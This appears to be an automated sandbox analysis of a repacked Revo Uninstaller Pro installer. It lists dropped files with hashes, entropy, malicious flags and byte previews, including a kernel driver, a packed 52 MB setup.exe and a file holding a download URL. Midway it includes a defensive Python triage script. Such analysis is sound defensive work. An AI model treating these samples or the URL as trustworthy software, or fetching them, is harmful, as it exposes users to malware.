MD5:3496F90CD98263718552E231F2605E67
SHA1:5BA4DCC61A461C6F3575377B38AEEA3913BB3BD9
SHA-256:17DA614E8B8ACE89547B561BDE7B15EFEEEDA09B12A6D79DD1679B7A66D8D207
SHA-512:214C2146FA1C577A4414E1BA8E45C75115CCDF06F7377A830E82C32B4D0F4933F4A237433536DCB78E1E93145C85BAFDB3D217A7EB7420960532C081B58F29CD
Malicious:false
Preview:..;.L.a.n.g.u.a.g.e. .f.i.l.e. .o.f. .R.e.v.o. .U.n.i.n.s.t.a.l.l.e.r. .P.r.o.....;.T.h.i.s. .s.e.c.t.i.o.n. .m.u.s.t. .u.s.e. .E.n.g.l.i.s.h.....[.I.n.f.o.].....L.a.n.g.u.a.g.e.=.T.i...n.g. .V.i...t./.V.i.e.t.n.a.m.e.s.e. .....W.e.b.L.a.n.g.=.V.N.....T.r.a.n.s.l.a.t.o.r.=. .....n.g. .T.r...n. .L... .A.n.h.....C.o.d.e.p.a.g.e.=.U.N.I.C.O.D.E. .....V.e.r.s.i.o.n.=.5...3...4.............[.U.n.i.n.s.t.a.l.l.e.r. .T.o.o.l.b.a.r.].....1.0.2. .=. .H.i...n. .t.h.......1.0.3. .=. .T...y. .c.h...n.....1.0.4. .=. .G... .b.......1.0.5. .=. .C...n.g. .c.......1.0.6. .=. .C.h... ..... .t.r.u.y. .t...m.....1.0.7. .=. .D.a.n.h. .s...c.h.....1.0.8. .=. .B.i...u. .t.....n.g.....1.0.9. .=. .C.h.i. .t.i...t.....1.1.0. .=. .G... .b.......1.1.1. .=. .X.o...a. .t.r.o.n.g. .r.e.g.i.s.t.r.y.....1.1.2. .=. .L...m. .m...i.....1.1.3. .=. .B...n. .c... .m.u...n. .g... .r.e.g.i.s.t.r.y. .....i. .t.....n.g. ..... .c.h...n.?.....1.1.4. .=. .B...n. .c... .m.u...n. .g... .p.h...n. .m...m. ..... .c.h...n.?.....1.1.5. .
Process:C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe
File Type:ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):88
Entropy (8bit):4.6625095008025434
Encrypted:false
SSDEEP:3:nVN2kLnCvvEOVtqvepJQjkX3TAX:nvxrCvvEOPqvewwX8X
MD5:85F8F277D3AB3F45C089C0B81116D85E
SHA1:9D3106AE997DB2F449894446B296C5A14EC20E91
SHA-256:6E6B62366A433BF575E72582FA7690C7B7901945B9C138F177FE657F00D77B3C
SHA-512:C5A05526A1DF5A6E1B9F5E1DA9E602C78F87C4B189ECFB61BF8407BDD6B5316EE866435F1D70086A2601DFD40C90FA5B1DB12D1C1E51DE9BA2F7174306AC1276
Malicious:false
Preview:taskkill /IM RevoUninPro.exe /F..taskkill /IM ruplp.exe /F.."%~dp0\ruplp.exe" /regserver
Process:C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe
File Type:PE32+ executable (native) x86-64, for MS Windows
Category:dropped
Size (bytes):38400
Entropy (8bit):6.303083119559888
Encrypted:false
SSDEEP:768:A1uOPkxgu01UuLjQL1nHSSdW7W0fz1Qp33u43gf:AQqk7HL1nO/Qtrgf
MD5:EC8E58E6B58B4FCDE77431CDA3A24C0E
SHA1:EBB474009B2A2FBCE648ADFF4B8B797FCD00C997
SHA-256:25667717BF4691957F07A6363585E2C7EAF22E5FD7229BF32C91EA59EF4A2EDD
SHA-512:E2C667EBE97973FF27C1EDF3E45EBF7950BC8D7AAD1126DA25290A2F590B21808654694CBE6A0AD1D3649566EC7645EB6B3379C7D7C0A650D5381A69E9CDADE4
Malicious:false
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...................p....k...........................................Rich....................PE..d...:.._.........."......T...2.................@....................................o^....`A...................................................P....................r...$......D...hR..8............................R...............P...............................text....:.......<.................. ..h.rdata..l....P.......@..............@..H.data........`.......L..............@....pdata...............N..............@..HPAGE....G............R.............. ..`INIT.................\.............. ..bINIT....@............j..............@....rsrc................l..............@..B.reloc..D............p..............@..B........................................................................................................................................
Process:C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe
File Type:Windows setup INFormation
Category:dropped
Size (bytes):2444
Entropy (8bit):4.986959697467434
Encrypted:false
SSDEEP:48:uNxfNNQB7y7CTOYMTf/kphtF/iifITJAld2dCOofc0MqFzA:uTfNNQB7yWO7TfMDtVpfINxCOofc32A
MD5:5187AC55870310AFF60ED802A729A31A
SHA1:CEA83A2959CFAC57C75DF6BD9618E71FE9F481CA
SHA-256:084309301CA31FC8384E97B30F0867559FBD20C38772E1FF7573D24BBC1A0833
SHA-512:70D1C28D87F223ECD93196AEB1C96591095B6A5C41ADE2CF11C08182FE872986206706F7BF2F72F44D16803DCF593249872ADD4724AF13EF7BB328A48C6CDB73
Malicious:false
Preview:;;;..;;; Revoflt..;;;..;;;..;;; Copyright (c) 2009, VS Revo Group Ltd...;;;....[Version]..Signature = "$Windows NT$"..Class = "ActivityMonitor" ;This is determined by the work this filter driver does..ClassGuid = {b86dff51-a31e-4bac-b3cf-e8cfe75c9fc2} ;This value is determined by the Class..Provider = %VSRG%..DriverVer = 12/30/2009,1.0.0.4..CatalogFile = ......[DestinationDirs]..DefaultDestDir = 12..Revoflt.DriverFiles = 12 ;%windir%\system32\drivers....;;..;; Default install sections..;;....[DefaultInstall]..OptionDesc = %ServiceDescription%..CopyFiles = Revoflt.DriverFiles....[DefaultInstall.Services]..AddService = %ServiceName%,,Revoflt.Service....;;..;; Default uninstall sections..;;....[DefaultUninstall]..DelFiles = Revoflt.DriverFiles....[DefaultUninstall.Services]..DelService = %ServiceName%,0x200 ;Ensure service is stopped before deleting....;..; Services Section..;....[Revoflt.
Process: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe
File Type: PE32+ executable (native) x86-64, for MS Windows
Category: dropped
Size (bytes): 38400
Entropy (8bit): 6.303083119559888
Encrypted: false
SSDEEP: 768:A1uOPkxgu01UuLjQL1nHSSdW7W0fz1Qp33u43gf:AQqk7HL1nO/Qtrgf
MD5: EC8E58E6B58B4FCDE77431CDA3A24C0E
SHA1: EBB474009B2A2FBCE648ADFF4B8B797FCD00C997
SHA-256: 25667717BF4691957F07A6363585E2C7EAF22E5FD7229BF32C91EA59EF4A2EDD
SHA-512: E2C667EBE97973FF27C1EDF3E45EBF7950BC8D7AAD1126DA25290A2F590B21808654694CBE6A0AD1D3649566EC7645EB6B3379C7D7C0A650D5381A69E9CDADE4
Malicious: true
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...................p....k...........................................Rich....................PE..d...:.._.........."......T...2.................@....................................o^....`A...................................................P....................r...$......D...hR..8............................R...............P...............................text....:.......<.................. ..h.rdata..l....P.......@..............@..H.data........`.......L..............@....pdata...............N..............@..HPAGE....G............R.............. ..`INIT.................\.............. ..bINIT....@............j..............@....rsrc................l..............@..B.reloc..D............p..............@..B........................................................................................................................................

Process: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe
File Type: SQLite 3.x database, last written using SQLite version 3007016, page size 1024, file counter 53475, database pages 19288, 1st free page 14928, free pages 4, cookie 0x5f, schema 1, UTF-8, version-valid-for 53475
Category: dropped
Size (bytes): 19750912
Entropy (8bit): 5.916143535151713
Encrypted: false
SSDEEP: 49152:GEKRfz9PgHG9uUkqS/cmsLPGkLgHfC8wlPWz88RlfpwrjsWWv89uwbSzAMZo6h8e:GRfB2upPBxAUg/Jb9R
MD5: E821132DBECE4D288D3B1B3B68373B3A
SHA1: DAC86F72E5C2AAEB5EFDFEA06BF9C5DEF980C74E
SHA-256: E786FA86DB21A4FFE8F78EBF032715390C05D1EDBDB6C90FEF75E0ED3D946CD3
SHA-512: 4701788F4A91F76F3A63843935DF5A8F80535D85FF0F760AF86C21601D73B40F8C4D00A883DC64E50482C201BB7D4F3867A038223593227AC79AA14520F2068E
Malicious: false
Preview: SQLite format 3......@ ......KX..:P......._.....................................................-.(.................R.......................................!........tableILogsILogs..CREATE TABLE [ILogs] ([Number] INTEGER PRIMARY KEY NOT NULL UNIQUE, [Name] TEXT NOT NULL, [Publisher] TEXT, [Version] TEXT NOT NULL, [GUID] TEXT NOT NULL UNIQUE, [WVer] TEXT NOT NULL, [WVer64Bits] INTEGER NOT NULL, [RKey] TEXT, [RDN] TEXT, [RUS] TEXT, [RPVer] TEXT)*...=...indexsqlite_autoindex_ILogs_2ILogs..*...=...indexsqlite_autoindex_ILogs_1ILogs.......Q.5G!..indexsqlite_autoindex_ILogs_bak0_2ILogs_bak0....UG!..indexsqlite_autoindex_ILogs_bak0_1ILogs_bak0.... .!!...tableILogs_bak0ILogs_bak0.CREATE TABLE "ILogs_bak0" ([Number] INTEGER PRIMARY KEY NOT NULL UNIQUE, [Name] TEXT NOT NULL, [Version] TEXT NOT NULL, [GUID] TEXT NOT NULL UNIQUE, [WVer] TEXT NOT NUL...T))._tablecreation_tablecreation_tableC.CREATE TABLE creation_table (tmp INTEGER)X........tableInfoInfo.CREATE TABLE Info (NProgs TEXT, Ver TEXT, D

Process: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe
File Type: PE32 executable (GUI) Intel 80386, for MS Windows
Category: dropped
Size (bytes): 10103264
Entropy (8bit): 6.199563892292486
Encrypted: false
SSDEEP: 196608:TqWbk1lXrMI8h9rGe2DvwfaycAE9kspvCJ6UkXzp91IIH91IL91I0:Tq2OiI8h8rBx91IW91IL91I0
MD5: 216B49B7EB7BE44D7ED7367F3725285F
SHA1: CF0776ECBC163C738FD43767BEDCC2A67ACEF423
SHA-256: C6D97857B3B9F26C8E93D7B6E6481F93A16DB75CBF9D1756CB29FBA0FD9E240E
SHA-512: 060FB76D91BEE1B421F133CAE17726A68ADC97DDCE76A67196D10E735E216D032BEE939C905B847C50F29E859DCA43CDF1B19E4AE349E00EFE88147224D665CB
Malicious: false
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L.....?Y..................^..L;.......^.......^...@.......................... ..................@...................@i.b.....h..k...0q...1..............5...pi..............................`i.......................h......0i......................text....n^......p^................. ..`.itext..x2....^..4...t^............. ..`.data....-....^.......^.............@....bss.........._..........................idata...k....h..l...._.............@....didata......0i......B`.............@....edata..b....@i......N`.............@..@.tls.........Pi..........................rdata.......`i......P`.............@..@.reloc.......pi......R`.............@..B.rsrc.....1..0q...1...h.............@..@............. ......................@..@................

Process: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe
File Type: data
Category: dropped
Size (bytes): 65794
Entropy (8bit): 7.997450817749907
Encrypted: true
SSDEEP: 1536:wg8dvQaFp4zqjLCzkCYlnXMEbnxbiHgsWtXTiKE6AXutI0b:6dvPFHLCzYlnXBUg3TibT+5
MD5: 8462A9B69C76A9603A4143D51FBC201E
SHA1: 4473590F93F94F22C340A354516191C3C0BA6532
SHA-256: FE4BCB4251F77375119A936C80FB36221AF0C5105E840E2E115D47F96CB437C8
SHA-512: 2F02ECDB06760A093F4D8E6F04C97138695B064DB8CB2DCC4AF9B47C829852F38B77BE9425EB2F3E3E36F85DA181C116C829921FA35AE68AFC57C728D5393570
Malicious: false
Preview: ...h..$...n.y].o~....(...G..\.....%..c..<..`......*..../p...N.?H.K....*...c.1~.K...No.yF...$..u..1z..-....>..1.jT=.....t....m.45`D.).w..d]m..F....s3=..6.#.....F...*j.Z..^...:\).......?..f39.$E.F.&....L)..*$dQ.F..T..j.p..h@..b..Qd..H.gO.q..>.....WA...[...P...Jf....".....KV.,.,D_I.b,._..r..g....B.I.....F..Dh3...4..Bg..........P.,y....9B.\..).7...v..d:.b...L........ ?._. .>o..@q......K.........\...jv;.......{}....UH..J/.|..1.g"N.#PRB.c...D..=d.g.........9.....h.%i...-Q55....W...1g.[.=]..<$.4..]7K.Y.T.....q....1...s....N. EC.E.Ov.S..G.YE....g.......U..]...c..<...........2W.'..2.!....AE$@..H........8A.\.H.f.x\.|o.z.u%9.X...u>7....\'.VX.5=HR.."D~Y...9...r3.u.3...........jL...m`...d..vA...Q.l^.....8=.F.0.l..eg;b.....H.CwjbV3.... N............@.o.m.R..|n.e.\.......6..._.p.....r..U..Ha......r...)..%.qeg..(o..;...H....L*6.-...I.Q..V....b>Z.z.n.0!...O&..#.`..8.......y:..M..S........v..a;E\d.].!.7.....2M.$,...&..lu...)...U..i...P4..8.*1..6..k.

Process: C:\Windows\System32\runonce.exe
File Type: data
Category: dropped
Size (bytes): 24576
Entropy (8bit): 2.0805221367031055
Encrypted: false
SSDEEP: 384:AT2ALc5HmO8BW8QUV9iSdvoxnpfcHv9qoCSDxAKKwsrDlwp/lHuA85qcLpl9dvmX:ur
MD5: 6E91F61773A9AC46E649BD5994A87984
SHA1: 7E01D8F46AA036F290C082AAAD6EDF0BB1D59F56
SHA-256: F129573669E3AB37DF43C29F01CACBDEE81AB585C1E48963469D32E67B5E659D
SHA-512: 953D0AA6D884B37F82CEE91C9455330EC241D02C44FF385A9BBB13488FF3CBEA93B5C613D61579782DB78D13881AF255AD21EDD1C170A017E8F5D56791357222
Malicious: false
Preview: . ..............................................................................l...h...]c.@............. ......eJ......F|..ZJ..Zb..............................................,...@.t.z.r.e.s...d.l.l.,.-.1.1.2.......................................................@.t.z.r.e.s...d.l.l.,.-.1.1.1.............................................................R.............".g.ZJ..........E.x.p.l.o.r.e.r.S.t.a.r.t.u.p.L.o.g._.R.u.n.O.n.c.e...C.:.\.U.s.e.r.s.\.j.o.n.e.s.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.M.i.c.r.o.s.o.f.t.\.W.i.n.d.o.w.s.\.E.x.p.l.o.r.e.r.\.E.x.p.l.o.r.e.r.S.t.a.r.t.u.p.L.o.g._.R.u.n.O.n.c.e...e.t.l...........P.P.l...h......@............................................................................................................................................................................................................................................................................................................................................................................

Process: C:\Users\user\AppData\Local\Temp\7zSCAE7B8AA\setup.exe
File Type: PE32 executable (GUI) Intel 80386, for MS Windows
Category: dropped
Size (bytes): 52557824
Entropy (8bit): 7.999863400173674
Encrypted: true
SSDEEP: 1572864:n7yZY5/4lwimbCtaWcBsUjcNVvA1okyDlnCHqn:W0glpmOIOocHvrkyZJ
MD5: 75272ABD800147A68B0CC4D682B82DA3
SHA1: 8E8257578EC420F8C5E5302E30A1EDDB2501BFD7
SHA-256: 892192155025DFA8BF058D04BC1430AD073F29FD1F00EE3C05F41598D8536109
SHA-512: 1468568A34C4DA057B8D6E0618748B50EAC25BD534BE7C303FB299344E40891FD6EF662791D1E542C858AE91414524845AFAE02D628C9BBEBD75B6BBA5F80CA9
Malicious: false
Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......(2S&lS=ulS=ulS=u'+>t`S=u'+8t.S=u..8tAS=u..9t.S=u..>tyS=u'+9tyS=u'+<teS=ulS<u.S=u..5t:S=u...umS=ulS.umS=u..?tmS=uRichlS=u........PE..L...4.if...............'..........................@................................./.&...@..................................R..d....................y&..).......&......................................@............................................text............................... ..`.rdata..............................@..@.data....A...`.......J..............@....rsrc................`..............@..@.reloc...&.......(...j..............@..B........................................................................................................................................................................................................................................................................................................

Process: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe
File Type: ASCII text, with no line terminators
Category: dropped
Size (bytes): 35
Entropy (8bit): 4.036006945330954
Encrypted: false
SSDEEP: 3:N8MfXFLVt:2ghVt
MD5: 9D1787D69C72AE1531A6EFE6C058EBFA
SHA1: 847875E77AF8048EDF1A8A6D732D48F2A9B5CC96
SHA-256: 8C041E42595D9BF69B3293050B297A4BE644F57162DD362CA9C0E2EC15CE538D
SHA-512: 9A8CA8DFDEF274561C467B50C837C4BCA2A632995CEF8EDB565FA2872D4BD952EFD2EA0BDF32DA252CA0F949704245B8D335F1737B35F4D71ED35ADEFEE8F7C8
Malicious: false
Preview: https://mail.repack.me/tsjtmfdm.pkg

Process: C:\Users\user\AppData\Local\Temp\RarSFX0\ya.exe
File Type: PE32 executable (GUI) Intel 80386, for MS Windows
Category: dropped
Size (bytes): 2227280
Entropy (8bit): 7.916292558024388
Encrypted: false
SSDEEP: 49152:mVAbw0dQH5x+E1Q9AA06OT9S7+rICzXNagRt532Z8JtS:iAJdi3+ZN06+Nzdn5w8i
MD5: 5A1105F1C25A60B128D45EC03041BF48
SHA1: DCCC4587FB20170B8014DEB61A7C371FAC15ED01
SHA-256: C2A58EFE4CDD4CD48A9C2F77CBA4BC0898F0A5953F6065C2D270A8A1DC7A8FCD
SHA-512: 9058164DCD3B802268DC8D5EC916A53976CF17CF6A4D4F5BE9626B91DDAED7AE159E009E90E0FBF0D1E16CD4C00C4D9268FF67D2F5D43037002D91E4C4017D48
Malicious: false
Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......N....m...m...m..A....m..A....m...._m.....m.....m..A....m..A....m...m...m....\m....X..m...m0..m.....m..Rich.m..........PE..L.....if...............'..........................@..................................5"...@.................................H...d.......p.............!..+.......1...C...............................C..@...............0............................text............................... ..`.rdata..z...........................@..@.data....K..........................@....rsrc...p...........................@..@.reloc...1.......2..................@..B........................................................................................................................................................................................................................................................................................................

Process: C:\Users\user\AppData\Local\Temp\7zSCAE7B8AA\setup.exe
File Type: JSON data
Category: dropped
Size (bytes): 1768
Entropy (8bit): 4.387798711970492
Encrypted: false
SSDEEP: 48:YqRyRrRs2RDtRCRa7jRzRMR9R89R/R5DR3RoRXsRWEIiRTR4RbR8xRSRGjRIjRK1:FCFVDjS49QzqZ5NhMXwWELdc18XiWMK1
MD5: 9F974F37C6D2E65618B43735A39A3222
SHA1: 29664AB40F388E00AFE959EBF9D840BEA0DD59DD
SHA-256: 18894BB2111DCEF31F92F19A3244457C58A14BFC5C04688F3DB803492DA9F706
SHA-512: D829E225B290ECE8BFA583558D4AD68A7BD0825F78EA5CE8A3FC01F12BC0FCF16F6371082050085461583DF978251422F6556BED78830EFF20C83BC7B9FDE8F9
Malicious: false
Preview: {"features":{"01979299c8cd":{"state":"enabled"},"03b8357e5a08":{"state":"enabled"},"06fbbd0b7bf7":{"state":"enabled"},"0f9cf8758bcc":{"state":"disabled"},"1c4dddb65bac":{"state":"enabled"},"1d24dceb937a":{"state":"enabled"},"2114dc8bd72a":{"state":"enabled"},"26f7e2d59ecf":{"state":"enabled"},"278deecb29a1":{"state":"enabled"},"3389f6c15eb9":{"state":"enabled"},"3993848b2bd9":{"state":"enabled"},"3fc0872a857b":{"state":"enabled"},"40db6e644d2c":{"state":"disabled"},"50796754ffc7":{"state":"enabled"},"5448a57d6689":{"state":"disabled"},"54a846ecd4f2":{"state":"enabled"},"56d717ae3ad6":{"state":"enabled"},"5a28d66c82cd":{"state":"enabled"},"5ee708e89d7b":{"state":"disabled"},"603cade21cf7":{"state":"enabled"},"654296fe9d6c":{"state":"enabled"},"6713f3df0bed":{"state":"enabled"},"804beb213cf7":{"state":"enabled"},"818c3ef12d0b":{"state":"enabled","dna_filter":{"required_dna":["64336fb81a04836eb8108d24fbca3aa3682db0a5"],"forbidden_dna":["5b3eb4a6c335a0659d16d1a189ca155e4441ea14"]}},"8be49a

                                                                                                                                                                          Process:C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe
                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):419886
                                                                                                                                                                          Entropy (8bit):7.320460842483817
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:6144:q/iQb+ckQsH8TDRGKJkSvGUlYG2EY8NqK9XXHJoPNKAZzOndNyLMfjRxXdS:5Qnk3GDYKGcblBY8Y23mZ0dYmV0
                                                                                                                                                                          MD5:A868E9C0A97C2EF80602C0F6634913F8
                                                                                                                                                                          SHA1:9E3F70A600DDC17D018612B08854F702E24AE5D3
                                                                                                                                                                          SHA-256:691DF930404FB3CB974F183C849C4B1EDDC63EC3BCA579EEE24F8A59E702FE11
                                                                                                                                                                          SHA-512:611D06A34D007CB4D321400A318BA727B07971916F7207EF7D0D45383B7DC38361EA296904646F9079D9C42D87BD375F500D969BF9AA9C6906472655D84E6EF1
                                                                                                                                                                          Malicious:true
                                                                                                                                                                          Antivirus:
                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 30%
                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......b`..&...&...&.....h.+.....j.......k.>.....^.$...._..0...._..5...._....../y..,.../y..#...&...,...._......._..'...._f.'...._..'...Rich&...................PE..L....}|^..................................... ....@..................................D....@.........................@...4...t...<.... ..''...................P...!.....T............................B..@............ ..`...... ....................text............................... ..`.rdata..2.... ......................@..@.data....8..........................@....gfids..............................@..@.rsrc...''... ...(..................@..@.reloc...!...P..."..................@..B........................................................................................................................................................................................................................................
                                                                                                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                          File Type:data
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):2228
                                                                                                                                                                          Entropy (8bit):5.333176307128504
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:48:FWSU4Yymp+gs4RIoU99tK8NPZHYsu1iMugeVV/gXnPUyuq1xf:FLHYvvsIfA2KRHKugWqp
                                                                                                                                                                          MD5:A3CB5CD774669961BE0AB119D9C772CB
                                                                                                                                                                          SHA1:74B0632A2D273BC4D9F4D85C0DDA2029127231D1
                                                                                                                                                                          SHA-256:9635016EAA9B3A19CAA23A41D896771EE25704E5C59B998572AE219A8CB2F3D8
                                                                                                                                                                          SHA-512:802FDB022D4FAF3EB9CD4F7D61D30BE0AC182EA36A7666A3EE30E12FFA9F5232C3B35BA8F67586261FCAF23039148B15216D69F646F7D0593F5C79B5E2F5CAEC
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Preview:@...e.......................T.S.S.......*.......................P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices<...............i..VdqF...|...........System.Configuration4.................%...K... ...........System.Xml..4.....................@.[8]'.\........System.Data.H................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...L.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.8..................1...L..U;V.<}........System.Numerics.<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com
                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\7zSCAE7B8AA\setup.exe
                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):52557824
                                                                                                                                                                          Entropy (8bit):7.999863400173674
                                                                                                                                                                          Encrypted:true
                                                                                                                                                                          SSDEEP:1572864:n7yZY5/4lwimbCtaWcBsUjcNVvA1okyDlnCHqn:W0glpmOIOocHvrkyZJ
                                                                                                                                                                          MD5:75272ABD800147A68B0CC4D682B82DA3
                                                                                                                                                                          SHA1:8E8257578EC420F8C5E5302E30A1EDDB2501BFD7
                                                                                                                                                                          SHA-256:892192155025DFA8BF058D04BC1430AD073F29FD1F00EE3C05F41598D8536109
                                                                                                                                                                          SHA-512:1468568A34C4DA057B8D6E0618748B50EAC25BD534BE7C303FB299344E40891FD6EF662791D1E542C858AE91414524845AFAE02D628C9BBEBD75B6BBA5F80CA9
                                                                                                                                                                          Malicious:true
                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......(2S&lS=ulS=ulS=u'+>t`S=u'+8t.S=u..8tAS=u..9t.S=u..>tyS=u'+9tyS=u'+<teS=ulS<u.S=u..5t:S=u...umS=ulS.umS=u..?tmS=uRichlS=u........PE..L...4.if...............'..........................@................................./.&...@..................................R..d....................y&..).......&......................................@............................................text............................... ..`.rdata..............................@..@.data....A...`.......J..............@....rsrc................`..............@..@.reloc...&.......(...j..............@..B........................................................................................................................................................................................................................................................................................................
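The record above is a 52 MB PE32 dropped by setup.exe with an 8-bit entropy of 7.9999 and the Encrypted flag set, while the other dropped PEs sit around 6.8 to 7.3. The following Python is an added example (not Joe Sandbox code) that reproduces the per-file fields the report lists for a dropped file: the four digests, 8-bit Shannon entropy, a minimal MZ/PE sniff for the File Type column, an Encrypted verdict, and an extension-versus-content check. The 7.9 bits/byte cut-off is this example's assumption, since the report does not state the threshold behind its Encrypted flag, and `fake_pe` builds a constructed header rather than reading any file from the analysis.

```python
import hashlib
import math
import os
from collections import Counter

# Assumed cut-off for this example: the report does not publish the entropy
# threshold behind its "Encrypted" flag. 7.9 bits/byte is a common heuristic
# for compressed, packed or encrypted payloads.
ENCRYPTED_ENTROPY_THRESHOLD = 7.9

# Extensions whose content should sniff as a PE image.
PE_EXTENSIONS = {".exe", ".dll", ".sys", ".ocx", ".scr"}


def shannon_entropy(data: bytes) -> float:
    """8-bit Shannon entropy in bits per byte: 0.0 for a constant file, 8.0 for uniform bytes."""
    if not data:
        return 0.0
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in Counter(data).values())


def digests(data: bytes) -> dict:
    """The four digests the report lists per file, upper-case hex like the report."""
    return {algo: hashlib.new(algo, data).hexdigest().upper()
            for algo in ("md5", "sha1", "sha256", "sha512")}


def file_type(data: bytes) -> str:
    """Minimal MZ/PE sniff: follow e_lfanew to the PE signature, then read the optional-header magic."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return "data"
    e_lfanew = int.from_bytes(data[0x3C:0x40], "little")
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        return "MZ (no PE header)"
    magic_off = e_lfanew + 4 + 20  # PE signature (4 bytes) + COFF file header (20 bytes)
    magic = int.from_bytes(data[magic_off:magic_off + 2], "little")
    return {0x10B: "PE32", 0x20B: "PE32+"}.get(magic, "PE (unknown optional header)")


def extension_mismatch(name: str, data: bytes) -> bool:
    """True when the extension promises a PE but the bytes are not one, or the reverse."""
    ext = os.path.splitext(name)[1].lower()
    is_pe = file_type(data).startswith("PE")
    return is_pe != (ext in PE_EXTENSIONS)


def triage(name: str, data: bytes) -> dict:
    """Summarise one dropped file the way the report's per-file record does."""
    ent = shannon_entropy(data)
    return {
        "name": name,
        "size": len(data),
        "type": file_type(data),
        "entropy": round(ent, 6),
        "encrypted": ent >= ENCRYPTED_ENTROPY_THRESHOLD,
        "ext_mismatch": extension_mismatch(name, data),
        **digests(data),
    }


def fake_pe(magic: int = 0x10B, payload: bytes = b"") -> bytes:
    """Constructed sample for this example: DOS header, PE signature and optional-header magic, no sections."""
    hdr = bytearray(0x40 + 4 + 20 + 2)
    hdr[0:2] = b"MZ"
    hdr[0x3C:0x40] = (0x40).to_bytes(4, "little")   # e_lfanew -> PE signature at 0x40
    hdr[0x40:0x44] = b"PE\0\0"
    hdr[0x58:0x5A] = magic.to_bytes(2, "little")    # 0x40 + 4 + 20 = 0x58
    return bytes(hdr) + payload


if __name__ == "__main__":
    # A constructed near-uniform payload stands in for the packed installer body.
    for row in (triage("setup_payload.exe", fake_pe(payload=bytes(range(256)) * 64)),
                triage("installer.log", b"[1209/115408.145:INFO] Opera installer starting\n" * 50)):
        print({k: row[k] for k in ("name", "size", "type", "entropy", "encrypted", "ext_mismatch", "sha256")})
```

The high entropy of the 52 MB setup.exe is what a compressed installer payload looks like, so the Encrypted flag on its own does not separate a packed commercial installer from a packed dropper; it is the combination with the other columns (a PE dropped into Temp by an unsigned sample, re-executed, and itself dropping further PEs and a driver) that carries the signal.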
                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\7zSCAE7B8AA\setup.exe
                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):5740952
                                                                                                                                                                          Entropy (8bit):6.869655224466312
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:98304:Y5hxwD6666666666666666666666666666666x666666666666666fwwwwwwwwwt:H3gRKPR+UIYbL8v515oa7IC
                                                                                                                                                                          MD5:F9DA76E8D7DB633AB031EE5AC59BB55E
                                                                                                                                                                          SHA1:ACD4E95365DBD1256B8DDAA747C82AD8EF3D85CD
                                                                                                                                                                          SHA-256:2A4E429693A6DA362CD89967271831B99C88F0C6F696946E66852969D883233B
                                                                                                                                                                          SHA-512:76BBBD271182109E501482A23D136DA0C8A4669664A9B284C7C8249870D1CE47191BEFA69D668719B63225211A4F9DB8B63E3BAB41D5F35C33455B4D18832513
                                                                                                                                                                          Malicious:true
                                                                                                                                                                          Antivirus:
                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                          Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L.....Ng.........."......d....S...................@...........................W.....t.X...@.................................8%..P.........Q..........pW..)....W..6...".......................!.......................'...............................text...;b.......d.................. ..`.rdata...............h..............@..@.data...$5...P.......8..............@....tls.................V..............@....rsrc.....Q.......Q..X..............@..@.reloc...6....W..8...8W.............@..B........................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\7zSCAE7B8AA\setup.exe
                                                                                                                                                                          File Type:ASCII text, with very long lines (1613)
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):5580
                                                                                                                                                                          Entropy (8bit):5.740851370470795
                                                                                                                                                                          Encrypted:false
